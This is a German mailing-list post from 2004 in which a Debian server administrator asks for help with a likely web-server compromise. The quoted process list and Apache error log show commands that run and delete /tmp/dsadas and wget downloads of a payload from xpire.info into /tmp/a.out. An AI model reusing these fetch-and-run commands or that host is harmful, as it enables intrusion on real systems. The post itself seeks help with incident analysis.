[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Apache macht komische Dinge

Hallo Liste,

kann mir hier jemand auf die Sprünge helfen, bzw. weiterführende Links
nennen was ich mir da eingefangen habe?

System ist ein Debian-Woody mit aktuellen Security-Patches.

Heute abend fiel mir das in 'top' auf:
20788 www-data  18   0   488  460   428 R    51.6  0.1   0:01 exe
20787 www-data  14   0   488  460   428 R    46.8  0.1   0:05 exe

'ps aux' lieferte das hier:
www-data 20769 47.7  0.1  1480  460 ?        R    19:36   0:06 sh -c
/tmp/dsadas;rm -f /tmp/dsadas
www-data 20783 45.1  0.1  1480  460 ?        R    19:36   0:02 sh -c
/tmp/dsadas;rm -f /tmp/dsadas

Diese beiden Prozesse ließen sich auch durch das Beenden von 'apache'
und 'apache-ssl' nicht beirren, ich habe sie dann von Hand durch ein
'kill' beendet.

/var/log/apache/error.log gibt folgendes her:
[Sat Aug 21 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
/tmp/dsadas: No such file or directory
exe: no process killed
dsadas: no process killed
/tmp/dsadas: no process killed
exe: no process killed
dsadas: no process killed
/tmp/dsadas: no process killed
/tmp/dsadas: No such file or directory
[Sun Aug 22 06:25:16 2004] [notice] SIGUSR1 received.  Doing graceful
restart

und heute:
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K .......... ........                                   100%   20.04
KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]

ls: /usr/bin/X11/X: No such file or directory
--18:06:33--  http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]
0K .......... ........                                   100%   14.68
KB/s
18:06:35 (14.68 KB/s) - `/tmp/a.out' saved [19147/19147]
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
[Mon Aug 23 19:33:56 2004] [notice] caught SIGTERM, shutting down


Erstmalig aufgetreten ist das am 12.08. Vorher konnte ich keine Einträge
dieser Art feststellen.

[Thu Aug 12 09:42:00 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
[Thu Aug 12 13:59:22 2004] [notice] caught SIGTERM, shutting down



Das Einzige was ich mit google gefunden habe ist
'http://www.imperialviolet.org/'. Die Jungs dort halten das ganze für
einen Hack der anderer Leute Leitungen floodet, hatten allerdings auch
"Reste" in '/tmp' und einen Prozess 'pra' auf einem tcp-Port.
Das hatte ich definitiv _nicht_. Weder einen zusätzlichen Port offen,
noch _irgendwas_ außer bekanntem in '/tmp'.



Any Hints?


PS: Nein, Sven. Nicht momo.


gruss
f
Reply to: